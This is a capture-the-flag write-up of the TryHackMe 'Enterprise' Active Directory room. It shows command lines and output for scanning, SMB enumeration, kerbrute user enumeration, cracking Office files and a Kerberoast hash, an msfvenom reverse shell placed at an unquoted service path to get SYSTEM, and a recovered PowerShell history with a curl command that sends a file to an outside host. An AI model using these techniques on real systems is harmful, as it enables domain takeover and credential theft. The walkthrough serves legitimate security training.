TryHackMe: Enterprise
TryHackMe: Enterpise by Sq00ky
You just landed in an internal network. You scan the network and there's only the Domain Controller...
Enumeration
Let's add to /etc/host and runrustscan as per usual.
╰─⠠⠵ rustscan -a enterprise --ulimit 10000 -- -sC -sV -oA enterprise -vv -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/home/tj/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.71.222:53
Open 10.10.71.222:80
Open 10.10.71.222:88
Open 10.10.71.222:135
Open 10.10.71.222:139
Open 10.10.71.222:389
Open 10.10.71.222:445
Open 10.10.71.222:464
Open 10.10.71.222:593
Open 10.10.71.222:3268
Open 10.10.71.222:3269
Open 10.10.71.222:3389
Open 10.10.71.222:5985
Open 10.10.71.222:9389
Open 10.10.71.222:7990
Open 10.10.71.222:47001
Open 10.10.71.222:49664
Open 10.10.71.222:49666
Open 10.10.71.222:49665
Open 10.10.71.222:49669
Open 10.10.71.222:49670
Open 10.10.71.222:49671
Open 10.10.71.222:49672
Open 10.10.71.222:49675
Open 10.10.71.222:49691
Open 10.10.71.222:49698
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-24 18:36 GMT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:36
Completed NSE at 18:36, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:36
Completed NSE at 18:36, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:36
Completed NSE at 18:36, 0.00s elapsed
Initiating Ping Scan at 18:36
Scanning 10.10.71.222 [2 ports]
Completed Ping Scan at 18:36, 0.04s elapsed (1 total hosts)
Initiating Connect Scan at 18:36
Scanning enterprise (10.10.71.222) [26 ports]
Discovered open port 53/tcp on 10.10.71.222
Discovered open port 139/tcp on 10.10.71.222
Discovered open port 80/tcp on 10.10.71.222
Discovered open port 3389/tcp on 10.10.71.222
Discovered open port 135/tcp on 10.10.71.222
Discovered open port 464/tcp on 10.10.71.222
Discovered open port 445/tcp on 10.10.71.222
Discovered open port 7990/tcp on 10.10.71.222
Discovered open port 49675/tcp on 10.10.71.222
Discovered open port 49666/tcp on 10.10.71.222
Discovered open port 88/tcp on 10.10.71.222
Discovered open port 49672/tcp on 10.10.71.222
Discovered open port 49698/tcp on 10.10.71.222
Discovered open port 49691/tcp on 10.10.71.222
Discovered open port 9389/tcp on 10.10.71.222
Discovered open port 5985/tcp on 10.10.71.222
Discovered open port 49671/tcp on 10.10.71.222
Discovered open port 49670/tcp on 10.10.71.222
Discovered open port 593/tcp on 10.10.71.222
Discovered open port 49664/tcp on 10.10.71.222
Discovered open port 49665/tcp on 10.10.71.222
Discovered open port 3268/tcp on 10.10.71.222
Discovered open port 389/tcp on 10.10.71.222
Discovered open port 47001/tcp on 10.10.71.222
Discovered open port 49669/tcp on 10.10.71.222
Discovered open port 3269/tcp on 10.10.71.222
Completed Connect Scan at 18:36, 0.07s elapsed (26 total ports)
Initiating Service scan at 18:36
Scanning 26 services on enterprise (10.10.71.222)
Completed Service scan at 18:37, 60.16s elapsed (26 services on 1 host)
NSE: Script scanning 10.10.71.222.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:37
Completed NSE at 18:38, 8.66s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.80s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
Nmap scan report for enterprise (10.10.71.222)
Host is up, received syn-ack (0.035s latency).
Scanned at 2021-03-24 18:36:56 GMT for 69s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2021-03-24 18:37:03Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: LAB-ENTERPRISE
| NetBIOS_Domain_Name: LAB-ENTERPRISE
| NetBIOS_Computer_Name: LAB-DC
| DNS_Domain_Name: LAB.ENTERPRISE.THM
| DNS_Computer_Name: LAB-DC.LAB.ENTERPRISE.THM
| DNS_Tree_Name: ENTERPRISE.THM
| Product_Version: 10.0.17763
|_ System_Time: 2021-03-24T18:38:00+00:00
| ssl-cert: Subject: commonName=LAB-DC.LAB.ENTERPRISE.THM
| Issuer: commonName=LAB-DC.LAB.ENTERPRISE.THM
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-03-11T02:11:05
| Not valid after: 2021-09-10T02:11:05
| MD5: d8c9 5a65 d898 d33c f8bd cff4 49a2 c4ea
| SHA-1: 7881 f6c1 a795 41a4 f568 30b7 5e7d 6f08 6df9 3ce0
| -----BEGIN CERTIFICATE-----
| MIIC9jCCAd6gAwIBAgIQGZG+bRktjrFDvW4ldSwrgjANBgkqhkiG9w0BAQsFADAk
| MSIwIAYDVQQDExlMQUItREMuTEFCLkVOVEVSUFJJU0UuVEhNMB4XDTIxMDMxMTAy
| MTEwNVoXDTIxMDkxMDAyMTEwNVowJDEiMCAGA1UEAxMZTEFCLURDLkxBQi5FTlRF
| UlBSSVNFLlRITTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAOrqv0Tw
| Zt+JgTN/CC0w8hD6hp+gv3R6zjDYl5JCGIlxIiS4+ddn6PXDHV3QexSWraNhsxML
| Ga1EGfoYTmWHkHXWu38/dgq/qhfYVqnrllyH0FlWZZuZbrGlBZIKySaYSwBlkkV7
| EYxbe5Dv9sVdAm3X6fgOcXRcy0rj7R7Z4mVNYX2Jxg5AGTTVAvZIG6NsB/7XXl7t
| IjH9x0KndeoGf0kFpC6Fs81leyvew5FaVNmQ3YfrQg6H8i1u3moyEL3RnMLAxUR2
| 6sU9FL7qx8iUaIzewIxRab0GDXcX3c3oJz2j02wKAO/DzsWLfiphN1Djo/dHXn3c
| VkfYHrfLeODb0JECAwEAAaMkMCIwEwYDVR0lBAwwCgYIKwYBBQUHAwEwCwYDVR0P
| BAQDAgQwMA0GCSqGSIb3DQEBCwUAA4IBAQCw7HHNzixGocP+5AnFaS10P//DDUDQ
| GS7yK2jEmR+qm4C30hNO4o1FmpvGe6pwI80KwQ8Ssg4lJpFsZW7tU93kY2BHMTLn
| 2NjZ1vSbmoRkNaL2tBo06q39gMxgJpnur4KIZvqsr5g8DMUFHQZRIkxF5HxoBGca
| YoEMgzpOOE6SDlG1Le9FZmdHFy5DJwk8MXlu2K5Uec7fEHVQez3fD3vKvZi8iP8j
| b4ZOBsb+rPnPa5tWllP6+cAys3RwktRo/fgCfptLtUkU+rVtrphUgjS1aNsOD67D
| /trlJ/bGJQka5LSdqQbcZJrxHJBxjSdQ+A+2ntkctGj6qJdoocWtedEZ
|_-----END CERTIFICATE-----
|_ssl-date: 2021-03-24T18:38:06+00:00; +1s from scanner time.
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7990/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Log in to continue - Log in with Atlassian account
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open msrpc syn-ack Microsoft Windows RPC
49671/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49672/tcp open msrpc syn-ack Microsoft Windows RPC
49675/tcp open msrpc syn-ack Microsoft Windows RPC
49691/tcp open msrpc syn-ack Microsoft Windows RPC
49698/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: LAB-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 33562/tcp): CLEAN (Couldn't connect)
| Check 2 (port 41303/tcp): CLEAN (Couldn't connect)
| Check 3 (port 54840/udp): CLEAN (Timeout)
| Check 4 (port 11446/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-03-24T18:37:58
|_ start_date: N/A
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:38
Completed NSE at 18:38, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.35 seconds
Ok, so we have a domain controller LAB-DC.LAB.ENTERPRISE.THM for the LAB.ENTERPRISE.THM domain.
80/http
We have port 80 open which is not normal for a domain controller so let's take a look.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<h1> Enterprise Domain Controller. Keep out! </h1>
</html>
Whilst I leave nikto and gobuster running let's move on........
445/smb
Let's run our smbclient and see what we get..
╰─⠠⠵ smbclient -L \\lab-dc
Enter WORKGROUP\tj's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Docs Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk Users Share. Do Not Touch!
SMB1 disabled -- no workgroup available
Ok, so let's take a look at Users
╰─⠠⠵ smbclient //lab-dc/Users
Enter WORKGROUP\tj's password:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Fri Mar 12 02:11:49 2021
.. DR 0 Fri Mar 12 02:11:49 2021
Administrator D 0 Thu Mar 11 21:55:48 2021
All Users DHSrn 0 Sat Sep 15 08:28:48 2018
atl[REDACTED] D 0 Thu Mar 11 22:53:06 2021
[REDACTED] D 0 Fri Mar 12 02:11:51 2021
Default DHR 0 Fri Mar 12 00:18:03 2021
Default User DHSrn 0 Sat Sep 15 08:28:48 2018
desktop.ini AHS 174 Sat Sep 15 08:16:48 2018
LAB-ADMIN D 0 Fri Mar 12 00:28:14 2021
Public DR 0 Thu Mar 11 21:27:02 2021
15587583 blocks of size 4096. 9718449 blocks available
From LAB-ADMIN we have LAB-ADMIN\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D which may contain some creds. We also have a powershell history file
| AppData/Roaming/Microsoft/Windows/Powershell/PSReadline/Consolehost_hisory.txt
cd C:\
mkdir monkey
cd monkey
cd ..
cd ..
cd ..
cd D:
cd D:
cd D:
D:\
mkdir temp
cd temp
echo "replication:101RepAdmin123!!">private.txt
Invoke-WebRequest -Uri http://1.215.10.99/payment-details.txt
more payment-details.txt
curl -X POST -H 'Cotent-Type: ascii/text' -d .\private.txt' http://1.215.10.99/dropper.php?file=itsdone.txt
del private.txt
del payment-details.txt
cd ..
del temp
cd C:\
C:\
exit
Here we see something that could be a username/password replication:101RepAdmin123!! but can not find anywhere for this to work.
7990/tcp
This looks like another IIS site
7990/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Log in to continue - Log in with Atlassian account
The form does not seem to work but we do have a note Reminder to all Enterprise-THM Employees:We are moving to Github! .....
Searching github we find a user
Nothing really obvious in the git repo
What is the contents of User.txt
After scanning round the box for a while I could not find anything useful so decided to try some brute forcing...
cd /opt
git clone https://github.com/ropnop/kerbrute.git
cd kerbrute
go build
./kerbrute userenum /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -d lab.enterprise.thm --dc "lab-dc"
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 03/24/21 - Ronnie Flathers @ropnop
2021/03/24 19:35:18 > Using KDC(s):
2021/03/24 19:35:18 > lab-dc:88
2021/03/24 19:35:20 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:35:21 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:35:26 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:35:42 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:35:52 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:36:01 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:36:11 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:36:11 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:37:01 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:37:03 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:37:29 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:38:55 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:38:56 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:38:58 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
2021/03/24 19:42:42 > [+] VALID USERNAME: [REDACTED]@lab.enterprise.thm
Trowing those through hydra was taking an age so decide to browse around the ENTERPRISE-THM git repo again. Browsed to Nik-enterpise-dev who was the only person listed.
Looking at the history we see the comment
I accidentally added something
And can see the first version includes a password.
Using these creds we can mount the /Docs share found above
╰─⠠⠵ sudo mount -t cifs //lab-dc/Docs mount -o username=nik,password=[REDACTED],workgroup=lab
╰─⠠⠵ ls mount
RSA-Secured-Credentials.xlsx RSA-Secured-Document-PII.docx
Unfortunately these are password protected
Using office2john we can grab the has to then feed into joh
╰─⠠⠵ /usr/share/john/office2john.py RSA-Secured-Document-PII.docx > office
╰─⠠⠵ /usr/share/john/office2john.py RSA-Secured-Credentials.xlsx >> office
╰─⠠⠵ john office --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Throwing these into hashcat takes some time....
Leaving that let's try and look for SPN's now we have a valid username and password.
╰─⠠⠵ python3 GetUserSPNs.py lab.enterprise.thm/nik:[REDACTED] -request
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- --------- ----------------------------------------------------------- -------------------------- -------------------------- ----------
HTTP/LAB-DC [REDACTED] CN=sensitive-account,CN=Builtin,DC=LAB,DC=ENTERPRISE,DC=THM 2021-03-12 01:20:01.333272 2021-03-15 04:07:33.747394
$krb5tgs$23$*[REDACTED]$LAB.ENTERPRISE.THM$lab.enterprise.thm/[REDACTED]*$f3b6650f71b8309a95cfe15877ba59ca$e81290b874a717993df3e1bb397a37c1d748c37011249c95dd6898c87faac100fe1e4e4533d90f7bdc7d7fdbf4083ad45526bd0fc1b06bad7ddddcbb37624c23e5417f58e4c20efdff3bd99f42b63a9b0e96205e36e2edda3cd225591bd84965c1fc83c2f56a44ce5f5e2cfbb4e30c74bc91fc70e8699b37b1af7715012f1ade73a4018e82c860f32f6ec64a52a2498a7cc03a788a7f141a243def93f5aab065b79e915e18ce00121170b3427d47e59b5789576f5851ced3b111343be8450fadff36757f0760ccc27f61ddfb63d01ff983d726997273aab9d8b9ff0eec3033372d13d55a01d292478b97f14935bb4e5fb5510b3c7897af9abf27db5b3876a844b585038061e5bcfa4592b2ae4c0b1bfbfce4febd8afe78f8cea88bb94638a286f4d3d6e0fb43271f0b5e3fecff93c727[REDACTED]b180573fe454711206a75d748ead49822fe3f4b7c0eb145344703d4a0e9037bfda4d13a2126af2a8541785dc9068881a78a3098a587d19955f03974c2794873ae8a8710c9e0051d909965498f5bb24a7505f02d5374cfa2236ba2441858bda0fd9e8064f372482e8856d3f4a495a9ac0fdc92cdb0d9b114eb3130e64278ec6325ab30d4a852d8b872936882cb59497f34edd8669ad32cdada591fd319b86efc79f70f1d702db3bc73d297f38828ff007828eabb0827f2e6e16d6fcbe3cbfa8f012470326bd39637bf89445351dc1acd57fb32ed024d6c5d325a486039ea4b985964a5d47b05af7498203adde9faf5e6e1a21827a04846b795a6f6ee78c54bd59366bcc1e81a345377c8778d37946b9b70176a32fcf5c358bf245194a7ee292b382f1719daa663c56966dece93b8ef814fbeb2d14d04d8b30acd4e56c9df60e96697a261a11b7bfe60420a[REDACTED]20f20e3397a7338465daeb463528184c5a6886af5e51388d645328b075328a69937c0374026ceaa12483b3bf9576cd20a10ae7a12ea3ec015d68e03dcba059f785da1f61c11fad90b1c5cc08ca62052dc904ccd56188f8e4577cab28a30157383b429ccebff485fc2ed5b5f29e46a43da5a098d6d82654b181b1366146702e9a5c3d0ca433e67ed558f3f74017ce756aad97b907bc598b4ce84a58f69a97c5b67002de7fbb879b7405e0679c1761084f5d244f104558989408a66506d6c898f31a886d5fc16a5f8a695d420aa07703c95c90b141739fa33bd06e6f3accb2a643702755b4aae40e7aca06ba01cc05
Throwing this into john we get the password
╰─⠠⠵ john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt tgt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED] (?)
1g 0:00:00:00 DONE (2021-03-24 20:47) 1.010g/s 1586Kp/s 1586Kc/s 1586KC/s livelife93..liss27
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Using this username/password we can remount /Users and access [REDACTED]'s desktop where the flag is stored.
╰─⠠⠵ sudo mount -t cifs //lab-dc/Users mount -o username=[REDACTED],password=[REDACTED],workgroup=lab
╰─⠠⠵ cd mount/[REDACTED]/
╰─○ cat Desktop/user.txt
THM{[REDACTED]}%
What is the contents of Root.txt
Now have the first flag we can start looking for some privEsc. Using rdesktop I had issues so ended up using xfreerdp to get a remote desktop.
╰─⠠⠵ xfreerdp /u:[REDACTED] /p:[REDACTED] /v:lab-dc
Copying over winPEAS.bat we look for anything interesting....
[+] UNQUOTED SERVICE PATHS
[i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Progam.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
[i] The permissions are also checked and filtered using icacls
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
ADWS
zerotieroneservice
C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe
Invalid parameter "Files"
Using this unquoted path we can run our own executable. First let's generate out exe with msfvenom
╰─⠠⠵ msfvenom -p windows/x64/shell/reverse_tcp -f exe LHOST={IP-ADDRES} LPORT=4444 -o shell4444.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: shell4444.exe
Then let's copy it to the box and save it as C:\Program Files (x86)\Zero Tier\Zero.exe
We can then use start-service zerotieroneservice to start the service and launch our exe to our waiting handler.
msf6 exploit(multi/handler) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > rerun
[*] Reloading module...
[*] Started reverse TCP handler on 10.9.0.xx:4444
[*] Sending stage (336 bytes) to 10.10.71.222
[*] Command shell session 1 opened (10.9.0.xx:4444 -> 10.10.71.222:52763) at 2021-03-24 21:43:28 +0000
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
THM{[REDACTED]}
Done!
What a PIA that rooms was, took far too long but guess I am out of practice with WIndows rooms.